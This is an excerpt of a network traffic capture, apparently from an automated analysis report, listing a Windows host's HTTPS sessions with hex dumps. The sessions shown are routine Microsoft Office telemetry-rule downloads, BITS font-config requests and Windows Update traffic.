version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.6	49743	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:24 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:25 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:25 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232525Z-174f7845968kvnqxhC1EWRmf3g0000000ddg0000000004kf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:25 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.6	49744	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:25 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:25 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:25 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232525Z-174f7845968pf68xhC1EWRr4h80000000uv00000000004mt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:25 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.6	49745	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:25 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:25 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:25 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232525Z-174f7845968xr5c2hC1EWRd0hn0000000bcg0000000003e2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:25 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.6	49746	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:25 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:26 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:26 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232526Z-174f7845968zgtf6hC1EWRqd8s0000000mh000000000050u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:26 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	49753	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:27 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:27 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232527Z-174f7845968cdxdrhC1EWRg0en0000000uf00000000003k9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49759	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:27 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-25 23:25:27 UTC	478	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=36484 Date: Mon, 25 Nov 2024 23:25:27 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:27 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:27 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:27 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232527Z-174f78459684bddphC1EWRbht40000000uag0000000000u0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:27 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	49756	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:27 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:27 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:27 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232527Z-174f7845968px8v7hC1EWR08ng0000000uxg0000000002wt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:27 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:27 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:27 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:27 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232527Z-174f7845968swgbqhC1EWRmnb40000000uug0000000000ft x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:27 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49758	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:27 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwuDxv8+uh2Eo4S&MD=141vAK7p HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-25 23:25:27 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 73313a0d-2070-4c67-89b2-aaaa52c1b5ff MS-RequestId: 311e0bf0-1c6c-47df-b47e-bed7a35cf01e MS-CV: CyTnrBAvPUyT3TOu.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 23:25:27 GMT Connection: close Content-Length: 24490
2024-11-25 23:25:27 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-25 23:25:28 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.6	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:28 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:28 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:28 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232528Z-174f7845968v75bwhC1EWRuqen0000000fm0000000000274 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:28 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49769	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:29 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-25 23:25:29 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=36460 Date: Mon, 25 Nov 2024 23:25:29 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-25 23:25:29 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:29 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
